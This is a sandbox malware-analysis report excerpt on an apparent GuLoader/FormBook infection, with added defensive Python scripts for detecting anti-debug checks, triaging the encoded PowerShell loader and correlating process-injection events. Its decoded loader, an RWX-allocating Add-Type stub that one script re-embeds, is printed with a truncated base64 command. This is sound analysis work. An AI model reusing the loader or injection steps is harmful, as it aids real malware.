Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB951BE mov eax, dword ptr fs:[00000030h] 24_2_1EB951BE
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EBE05AC mov eax, dword ptr fs:[00000030h] 24_2_1EBE05AC
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EBE05AC mov eax, dword ptr fs:[00000030h] 24_2_1EBE05AC
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB461A0 mov eax, dword ptr fs:[00000030h] 24_2_1EB461A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB461A0 mov eax, dword ptr fs:[00000030h] 24_2_1EB461A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB435A1 mov eax, dword ptr fs:[00000030h] 24_2_1EB435A1
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB969A6 mov eax, dword ptr fs:[00000030h] 24_2_1EB969A6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB42990 mov eax, dword ptr fs:[00000030h] 24_2_1EB42990
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB4FD9B mov eax, dword ptr fs:[00000030h] 24_2_1EB4FD9B
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB4FD9B mov eax, dword ptr fs:[00000030h] 24_2_1EB4FD9B
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB4A185 mov eax, dword ptr fs:[00000030h] 24_2_1EB4A185
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB3C182 mov eax, dword ptr fs:[00000030h] 24_2_1EB3C182
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB42581 mov eax, dword ptr fs:[00000030h] 24_2_1EB42581
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB42581 mov eax, dword ptr fs:[00000030h] 24_2_1EB42581
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB42581 mov eax, dword ptr fs:[00000030h] 24_2_1EB42581
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB42581 mov eax, dword ptr fs:[00000030h] 24_2_1EB42581
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB12D8A mov eax, dword ptr fs:[00000030h] 24_2_1EB12D8A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB12D8A mov eax, dword ptr fs:[00000030h] 24_2_1EB12D8A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB12D8A mov eax, dword ptr fs:[00000030h] 24_2_1EB12D8A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB12D8A mov eax, dword ptr fs:[00000030h] 24_2_1EB12D8A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB12D8A mov eax, dword ptr fs:[00000030h] 24_2_1EB12D8A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EBC8DF1 mov eax, dword ptr fs:[00000030h] 24_2_1EBC8DF1
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB1B1E1 mov eax, dword ptr fs:[00000030h] 24_2_1EB1B1E1
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB1B1E1 mov eax, dword ptr fs:[00000030h] 24_2_1EB1B1E1
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB1B1E1 mov eax, dword ptr fs:[00000030h] 24_2_1EB1B1E1
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EBA41E8 mov eax, dword ptr fs:[00000030h] 24_2_1EBA41E8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB2D5E0 mov eax, dword ptr fs:[00000030h] 24_2_1EB2D5E0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB2D5E0 mov eax, dword ptr fs:[00000030h] 24_2_1EB2D5E0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB96DC9 mov eax, dword ptr fs:[00000030h] 24_2_1EB96DC9
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB96DC9 mov eax, dword ptr fs:[00000030h] 24_2_1EB96DC9
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB96DC9 mov eax, dword ptr fs:[00000030h] 24_2_1EB96DC9
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB96DC9 mov ecx, dword ptr fs:[00000030h] 24_2_1EB96DC9
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB96DC9 mov eax, dword ptr fs:[00000030h] 24_2_1EB96DC9
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB96DC9 mov eax, dword ptr fs:[00000030h] 24_2_1EB96DC9
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB1AD30 mov eax, dword ptr fs:[00000030h] 24_2_1EB1AD30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB23D34 mov eax, dword ptr fs:[00000030h] 24_2_1EB23D34
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB23D34 mov eax, dword ptr fs:[00000030h] 24_2_1EB23D34
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB23D34 mov eax, dword ptr fs:[00000030h] 24_2_1EB23D34
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB23D34 mov eax, dword ptr fs:[00000030h] 24_2_1EB23D34
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB23D34 mov eax, dword ptr fs:[00000030h] 24_2_1EB23D34
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB23D34 mov eax, dword ptr fs:[00000030h] 24_2_1EB23D34
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB23D34 mov eax, dword ptr fs:[00000030h] 24_2_1EB23D34
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB23D34 mov eax, dword ptr fs:[00000030h] 24_2_1EB23D34
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB23D34 mov eax, dword ptr fs:[00000030h] 24_2_1EB23D34
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB23D34 mov eax, dword ptr fs:[00000030h] 24_2_1EB23D34
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB23D34 mov eax, dword ptr fs:[00000030h] 24_2_1EB23D34
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB23D34 mov eax, dword ptr fs:[00000030h] 24_2_1EB23D34
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB23D34 mov eax, dword ptr fs:[00000030h] 24_2_1EB23D34
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EBE8D34 mov eax, dword ptr fs:[00000030h] 24_2_1EBE8D34
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB4513A mov eax, dword ptr fs:[00000030h] 24_2_1EB4513A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB4513A mov eax, dword ptr fs:[00000030h] 24_2_1EB4513A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB9A537 mov eax, dword ptr fs:[00000030h] 24_2_1EB9A537
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB44D3B mov eax, dword ptr fs:[00000030h] 24_2_1EB44D3B
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB44D3B mov eax, dword ptr fs:[00000030h] 24_2_1EB44D3B
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB44D3B mov eax, dword ptr fs:[00000030h] 24_2_1EB44D3B
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB34120 mov eax, dword ptr fs:[00000030h] 24_2_1EB34120
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB34120 mov eax, dword ptr fs:[00000030h] 24_2_1EB34120
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB34120 mov eax, dword ptr fs:[00000030h] 24_2_1EB34120
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB34120 mov eax, dword ptr fs:[00000030h] 24_2_1EB34120
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB34120 mov ecx, dword ptr fs:[00000030h] 24_2_1EB34120
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB19100 mov eax, dword ptr fs:[00000030h] 24_2_1EB19100
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB19100 mov eax, dword ptr fs:[00000030h] 24_2_1EB19100
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB19100 mov eax, dword ptr fs:[00000030h] 24_2_1EB19100
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB1B171 mov eax, dword ptr fs:[00000030h] 24_2_1EB1B171
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB1B171 mov eax, dword ptr fs:[00000030h] 24_2_1EB1B171
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB3C577 mov eax, dword ptr fs:[00000030h] 24_2_1EB3C577
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB3C577 mov eax, dword ptr fs:[00000030h] 24_2_1EB3C577
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB1C962 mov eax, dword ptr fs:[00000030h] 24_2_1EB1C962
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB37D50 mov eax, dword ptr fs:[00000030h] 24_2_1EB37D50
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB53D43 mov eax, dword ptr fs:[00000030h] 24_2_1EB53D43
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB3B944 mov eax, dword ptr fs:[00000030h] 24_2_1EB3B944
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB3B944 mov eax, dword ptr fs:[00000030h] 24_2_1EB3B944
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB93540 mov eax, dword ptr fs:[00000030h] 24_2_1EB93540
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process queried: DebugPort
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\help.exe Process queried: DebugPort
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB596E0 NtFreeVirtualMemory,LdrInitializeThunk, 24_2_1EB596E0
Source: C:\Windows\System32\smartscreen.exe Memory allocated: page read and write | page guard
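The "mov eax, dword ptr fs:[00000030h]" hits listed above are reads of the PEB pointer; combined with the DebugPort query they are the two classic API-free debugger checks. The scanner below is an added example and is not code from this report or from the sample: it walks raw 32-bit code for fs:[0x30] loads and tells a real BeingDebugged check (a byte read at PEB+2 right after the load) apart from an ordinary PEB access. The SAMPLE bytes are constructed to show the pattern and were not extracted from ieinstal.exe; the 16-byte look-ahead window and the opcode forms it recognises are the example's own choices, and it is a byte-pattern heuristic, not a disassembler.

```python
"""
Heuristic scanner for the PEB-based debugger check behind the
"mov eax, dword ptr fs:[00000030h]" hits in the report.  Added example,
not code from the report or from the sample; the bytes in SAMPLE are
constructed and were not taken from ieinstal.exe.

In a 32-bit (WOW64) process fs: selects the TEB, TEB+0x30 is the PEB
pointer and PEB+0x02 is BeingDebugged, so

    mov   eax, fs:[0x30]          ; 64 A1 30 00 00 00  (64 8B 05 30 00 00 00 also seen)
    movzx eax, byte ptr [eax+2]   ; 0F B6 40 02

is IsDebuggerPresent() without the import.  A PEB load with no flag read
afterwards is ordinary (heap, module list), so the two are told apart.
On x64 the same check reads gs:[0x60]; this scanner is 32-bit only.
"""
import struct
from dataclasses import dataclass

REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
PEB_OFFSET = 0x30          # TEB -> PEB
BEING_DEBUGGED = 0x02      # PEB -> BeingDebugged


@dataclass
class PebAccess:
    offset: int            # offset of the fs:[0x30] load in the code blob
    register: str          # register that receives the PEB pointer
    reads_being_debugged: bool


def _peb_load(code: bytes, i: int):
    """(length, register) if code[i:] is 'mov r32, fs:[0x30]', else None."""
    if code[i] != 0x64:                                     # fs segment override
        return None
    if code[i + 1] == 0xA1 and len(code) >= i + 6:          # mov eax, fs:[disp32]
        if struct.unpack_from("<I", code, i + 2)[0] == PEB_OFFSET:
            return 6, "eax"
    elif code[i + 1] == 0x8B and len(code) >= i + 7:        # mov r32, fs:[disp32]
        modrm = code[i + 2]
        # mod=00 rm=101 means absolute disp32; the reg field is the destination
        if (modrm & 0xC7) == 0x05 and struct.unpack_from("<I", code, i + 3)[0] == PEB_OFFSET:
            return 7, REGS[(modrm >> 3) & 7]
    return None


def _reads_being_debugged(code: bytes, i: int, reg: str, window: int = 16) -> bool:
    """True if a byte read from [reg+2] follows within `window` bytes:
    movzx r32, byte ptr [reg+2] (0F B6 /r, disp8) or mov r8, byte ptr [reg+2] (8A /r, disp8)."""
    rm = REGS.index(reg)
    chunk = code[i:i + window]
    for j in range(len(chunk) - 2):
        if chunk[j:j + 2] == b"\x0f\xb6" and j + 3 < len(chunk):
            modrm, disp = chunk[j + 2], chunk[j + 3]
        elif chunk[j] == 0x8A:
            modrm, disp = chunk[j + 1], chunk[j + 2]
        else:
            continue
        if (modrm & 0xC7) == (0x40 | rm) and disp == BEING_DEBUGGED:   # mod=01 (disp8), rm=reg
            return True
    return False


def find_peb_checks(code: bytes) -> list[PebAccess]:
    hits, i = [], 0
    while i < len(code) - 1:
        m = _peb_load(code, i)
        if m is None:
            i += 1
            continue
        length, reg = m
        hits.append(PebAccess(i, reg, _reads_being_debugged(code, i + length, reg)))
        i += length
    return hits


# Constructed 32-bit code: one real BeingDebugged check, one benign PEB load.
SAMPLE = bytes.fromhex(
    "55 8B EC"                # push ebp ; mov ebp, esp
    "64 A1 30 00 00 00"       # mov eax, fs:[0x30]            ; PEB
    "0F B6 40 02"             # movzx eax, byte ptr [eax+2]   ; PEB->BeingDebugged
    "85 C0"                   # test eax, eax
    "75 05"                   # jnz debugged
    "64 8B 0D 30 00 00 00"    # mov ecx, fs:[0x30]            ; PEB again
    "8B 49 18"                # mov ecx, [ecx+0x18]           ; PEB->ProcessHeap (benign)
    "5D C3"                   # pop ebp ; ret
)

if __name__ == "__main__":
    for hit in find_peb_checks(SAMPLE):
        state = "BeingDebugged read" if hit.reads_being_debugged else "no flag read"
        print(f"0x{hit.offset:04x}: PEB -> {hit.register}, {state}")
```

Run against a dumped code section (for example the 24_2_1EB... region from process 24), a high count of PEB loads with no flag read is normal for any compiled binary; the ones followed by a read at +2 are the checks worth a breakpoint. Note that the DebugPort queries in the same list are a separate check (NtQueryInformationProcess with ProcessDebugPort) that this byte scanner does not cover.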

HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Section unmapped: C:\Windows\SysWOW64\help.exe base address: 2B0000
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\help.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\help.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\wscript.exe Process created: Base64 decoded #Bacong Sletn FEJLPLA Vindfl4 fara arter Overaro CINENEG Ddsofrer1 BRITTLEPA Semicoron Bunddyre1 UNMANAG RICOCHET henregn Inddelinge1 ROTATI Overfodres1 QUIET araban INDD ubetime aktivist perturbf JAGEREN KILOMEGA Achondr Bnne Congreg3 BRANDEN Ingenirt2 Revo Scir Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class Handl1{[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int Handl6,ref Int32 NONMALIG,int metategn,ref Int32 Handl,int Bordsk6,int Handl7);[DllImport("kernel32.dll")]public static extern IntPtr CreateFileA(string DAUGHTER,uint Tanzani5,int haan,int Handl0,int Fallacies5,int BGER,int Quinque7);[DllImport("kernel32.dll")]public static extern int ReadFile(int metategn0,uint metategn1,IntPtr metategn2,ref Int32 metategn3,int metategn4);[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(IntPtr metategn5,int metategn6,int metategn7,int metategn8,int metategn9);}"@#Vejrfo9 clockra LIMB Overm6 Hyper Disdain noncon toldattes Sulca Oprethol holochorda Kontrolkom Filter Bergmanns COENURI DAGN UDRKSSTRA Test-Path "blaalysene" Test-Path "Kuglepe1" $Handl3=0;$Handl9=1048576;$Handl8=[Handl1]::NtAllocateVirtualMemory(-1,[ref]$Handl3,0,[ref]$Handl9,12288,64)#DEFI Nont2 nonconst overtenac igdrasilma laantagere AMPHODA GALEHUSSHA Primordiai Autent5 Visc7 Columnists forbyt sprr Pyrexia blattif kyllingeh LIVFULDTV shatteri MAALSTNIN Semirad5 Fors5 IMMITIG
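The decoded PowerShell above is the whole loader stage: Add-Type compiles P/Invoke stubs (which is why csc.exe and cvtres.exe appear as children of powershell.exe further down), and NtAllocateVirtualMemory(-1, ..., 12288, 64) carves an RWX region in the current process. The script below is an added triage helper, not code from the report or from the sample. Because the -EncodedCommand blob printed on this page is truncated, SCRIPT is the decoded loader as the report prints it, with the original line breaks restored and the comment padding shortened, and is re-encoded here so the parser has a complete input; the regexes, the flag tables and the CALLBACK_RUNNERS set are the example's own.

```python
"""
Triage of a powershell.exe "-EncodedCommand" blob of the kind shown in
the report.  Added example, not code from the report or from the sample.

-EncodedCommand takes base64 of the script as UTF-16LE.  This loader pads
the script with '#' word-salad comments, declares P/Invoke stubs through
Add-Type, and calls NtAllocateVirtualMemory(-1, ...): -1 is the
current-process pseudo-handle, 12288 = 0x3000 = MEM_COMMIT|MEM_RESERVE and
64 = 0x40 = PAGE_EXECUTE_READWRITE.  CreateFileA/ReadFile next to a
CallWindowProcW import is consistent with reading a payload into that
region and entering it through the window-procedure callback (inference
from the declarations, not something the report states).
"""
import base64
import re

MEM_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x400000: "MEM_TOP_DOWN"}
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
# APIs that will run an arbitrary pointer as code via a callback (example's own list).
CALLBACK_RUNNERS = {"CallWindowProcW", "CallWindowProcA", "EnumWindows", "CreateThread"}

DLLIMPORT = re.compile(
    r'\[DllImport\("(?P<dll>[^"]+)"\)\]\s*public\s+static\s+extern\s+\w+\s+(?P<api>\w+)\(')
ALLOC_CALL = re.compile(r"::NtAllocateVirtualMemory\((?P<args>[^)]*)\)")


def encode_command(script: str) -> str:
    """What the dropper does: UTF-16LE, then base64 (no BOM)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(blob: str) -> str:
    return base64.b64decode(blob).decode("utf-16-le")


def strip_comments(script: str) -> str:
    """Drop '#' to end of line; in this loader the comments are pure padding."""
    return "\n".join(re.sub(r"#.*$", "", ln).rstrip() for ln in script.splitlines())


def pinvoke_imports(script: str) -> list[tuple[str, str]]:
    return [(m["dll"].lower(), m["api"]) for m in DLLIMPORT.finditer(script)]


def _resolve_int(script: str, token: str):
    """Literal int, or the value assigned to '$var' elsewhere in the script."""
    token = token.replace("[ref]", "").strip()
    if token.lstrip("-").isdigit():
        return int(token)
    m = re.search(re.escape(token) + r"\s*=\s*(-?\d+)", script)
    return int(m.group(1)) if m else None


def allocation_details(script: str):
    m = ALLOC_CALL.search(script)
    if not m:
        return None
    handle, _base, _zero_bits, size, alloc_type, protect = [a.strip() for a in m["args"].split(",")]
    t, p = _resolve_int(script, alloc_type), _resolve_int(script, protect)
    return {
        "own_process": handle == "-1",
        "size": _resolve_int(script, size),
        "alloc_type": [name for flag, name in MEM_FLAGS.items() if (t or 0) & flag],
        "protect": PAGE_PROTECT.get(p, hex(p) if p is not None else "?"),
    }


def triage(blob: str) -> dict:
    script = strip_comments(decode_command(blob))
    return {"imports": pinvoke_imports(script), "alloc": allocation_details(script)}


def is_shellcode_loader(report: dict) -> bool:
    """RWX memory in the current process plus a way to jump into it."""
    apis = {api for _, api in report["imports"]}
    alloc = report["alloc"]
    return bool(alloc) and alloc["own_process"] \
        and alloc["protect"] == "PAGE_EXECUTE_READWRITE" and bool(apis & CALLBACK_RUNNERS)


# Decoded loader as printed in the report, line breaks restored, comment padding shortened.
SCRIPT = r'''#Bacong Sletn FEJLPLA Vindfl4 fara arter Overaro CINENEG Ddsofrer1 BRITTLEPA
Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;
public static class Handl1
{
[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int Handl6,ref Int32 NONMALIG,int metategn,ref Int32 Handl,int Bordsk6,int Handl7);
[DllImport("kernel32.dll")]public static extern IntPtr CreateFileA(string DAUGHTER,uint Tanzani5,int haan,int Handl0,int Fallacies5,int BGER,int Quinque7);
[DllImport("kernel32.dll")]public static extern int ReadFile(int metategn0,uint metategn1,IntPtr metategn2,ref Int32 metategn3,int metategn4);
[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(IntPtr metategn5,int metategn6,int metategn7,int metategn8,int metategn9);
}
"@
#Vejrfo9 clockra LIMB Overm6 Hyper Disdain noncon toldattes Sulca Oprethol
Test-Path "blaalysene"
Test-Path "Kuglepe1"
$Handl3=0;$Handl9=1048576;$Handl8=[Handl1]::NtAllocateVirtualMemory(-1,[ref]$Handl3,0,[ref]$Handl9,12288,64)
#DEFI Nont2 nonconst overtenac igdrasilma laantagere AMPHODA GALEHUSSHA
'''
ENCODED = encode_command(SCRIPT)   # stands in for the blob after -EncodedCommand

if __name__ == "__main__":
    report = triage(ENCODED)
    print(report, "shellcode loader:", is_shellcode_loader(report))
```

For a real case, paste the string after -EncodedCommand into ENCODED. The same decoded text also lands in the PowerShell script block log (event 4104) when that logging is enabled, so the comment padding only defeats command-line string matching, not script-level telemetry.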
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Thread register set: target process: 3440
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Thread register set: target process: 3440
Source: C:\Windows\SysWOW64\help.exe Thread register set: target process: 3440
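The injection lines in this section each record one primitive in isolation: a section of the target unmapped, a section mapped into the target with execute permission, an APC queued into the target, and a thread context rewritten. The technique only becomes visible when the primitives are grouped per source and target pair, which is what the correlator below does. It is an added example, not code from the report; the rule table and the ATT&CK labels are the example's own, and SAMPLE_LINES are the report's event lines from this section with the page's navigation text removed. One caveat the data forces: "Thread register set" names its target by PID only, so it is reported per PID rather than joined to an image name, which a real tool would do against the process list.

```python
"""
Correlates sandbox injection events into a per (source, target) verdict.
Added example, not code from the report; rules and labels are the
example's own.  SAMPLE_LINES are the report's own event lines.

Unmap of the target + RWX section mapped into it = process hollowing.
RWX section + APC queued into the target = APC injection.
Thread context rewritten = SetThreadContext-style hijack, per PID.
"""
import re
from collections import defaultdict

EVENT = re.compile(
    r"^Source:\s+(?P<src>.+?\.exe)\s+"
    r"(?P<kind>Section unmapped|Section loaded|Thread APC queued|Thread register set):\s*"
    r"(?:unknown target:|target process:)?\s*"
    r"(?P<dst>\S+)"            # image path without spaces, or a PID
    r"(?P<rest>.*)$")

RULES = [   # (facts required, verdict); first matching rule wins
    ({"unmap", "map_rwx"}, "T1055.012 process hollowing"),
    ({"map_rwx", "apc"}, "T1055.004 APC injection"),
    ({"set_context"}, "T1055.003 thread execution hijacking (SetThreadContext)"),
    ({"map_rwx"}, "T1055 RWX section mapped into remote process"),
]


def _image(path: str) -> str:
    """Last path component, lower-cased; a bare PID is returned unchanged."""
    return path.rsplit("\\", 1)[-1].lower()


def parse_event(line: str):
    """-> (source image, target image or PID, fact) or None for other report lines."""
    m = EVENT.match(line.strip())
    if not m:
        return None
    kind, rest = m["kind"], m["rest"]
    if kind == "Section unmapped":
        fact = "unmap"
    elif kind == "Section loaded":
        fact = "map_rwx" if "execute" in rest else "map_rw"
    elif kind == "Thread APC queued":
        fact = "apc"
    else:
        fact = "set_context"
    return _image(m["src"]), _image(m["dst"]), fact


def correlate(lines) -> list[tuple[str, str, str]]:
    facts = defaultdict(set)
    for line in lines:
        ev = parse_event(line)
        if ev:
            src, dst, fact = ev
            facts[(src, dst)].add(fact)
    verdicts = []
    for (src, dst), seen in facts.items():
        for required, label in RULES:
            if required <= seen:
                verdicts.append((src, dst, label))
                break
    return sorted(verdicts)


# The report's own event lines for this section (navigation text removed).
SAMPLE_LINES = r"""
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Section unmapped: C:\Windows\SysWOW64\help.exe base address: 2B0000
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\help.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\help.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Thread register set: target process: 3440
Source: C:\Windows\SysWOW64\help.exe Thread register set: target process: 3440
""".strip().splitlines()

if __name__ == "__main__":
    for src, dst, label in correlate(SAMPLE_LINES):
        print(f"{src} -> {dst}: {label}")
```

On these lines the output names ieinstal.exe hollowing help.exe and APC-injecting explorer.exe, and help.exe mapping RWX memory into explorer.exe, which matches the chain the signature list summarises (GuLoader stage in ieinstal.exe, FormBook in the hollowed help.exe and in explorer.exe).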
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBCAGEAYwBvAG4AZwAgAFMAbABlAHQAbgAgAEYARQBKAEwAUABMAEEAIABWAGkAbgBkAGYAbAA0ACAAZgBhAHIAYQAgAGEAcgB0AGUAcgAgAE8AdgBlAHIAYQByAG8AIABDAEkATgBFAE4ARQBHACAARABkAHMAbwBmAHIAZQByADEAIABCAFIASQBUAFQATABFAFAAQQAgAFMAZQBtAGkAYwBvAHIAbwBuACAAQgB1AG4AZABkAHkAcgBlADEAIABVAE4ATQBBAE4AQQBHACAAUgBJAEMATwBDAEgARQBUACAAaABlAG4AcgBlAGcAbgAgAEkAbgBkAGQAZQBsAGkAbgBnAGUAMQAgAFIATwBUAEEAVABJACAATwB2AGUAcgBmAG8AZAByAGUAcwAxACAAUQBVAEkARQBUACAAYQByAGEAYgBhAG4AIABJAE4ARABEACAAdQBiAGUAdABpAG0AZQAgAGEAawB0AGkAdgBpAHMAdAAgAHAAZQByAHQAdQByAGIAZgAgAEoAQQBHAEUAUgBFAE4AIABLAEkATABPAE0ARQBHAEEAIABBAGMAaABvAG4AZAByACAAQgBuAG4AZQAgAEMAbwBuAGcAcgBlAGcAMwAgAEIAUgBBAE4ARABFAE4AIABJAG4AZwBlAG4AaQByAHQAMgAgAFIAZQB2AG8AIABTAGMAaQByACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzA